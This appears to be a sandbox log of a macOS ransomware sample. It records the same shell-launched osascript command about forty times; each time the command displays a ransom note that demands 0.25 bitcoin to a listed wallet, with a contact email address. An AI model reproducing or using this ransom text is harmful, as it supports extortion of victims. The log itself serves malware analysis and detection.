Source: /bin/sh (PID: 750)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 753)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 756)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 759)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 762)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 765)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 768)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 771)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 774)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 777)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 780)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 784)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 787)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 790)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 793)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 796)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 799)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 802)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 805)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 808)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 811)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 814)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 817)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 820)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 823)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 826)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 829)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 832)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 835)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 838)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 841)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 844)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 847)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 850)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 853)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 856)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 859)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 862)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
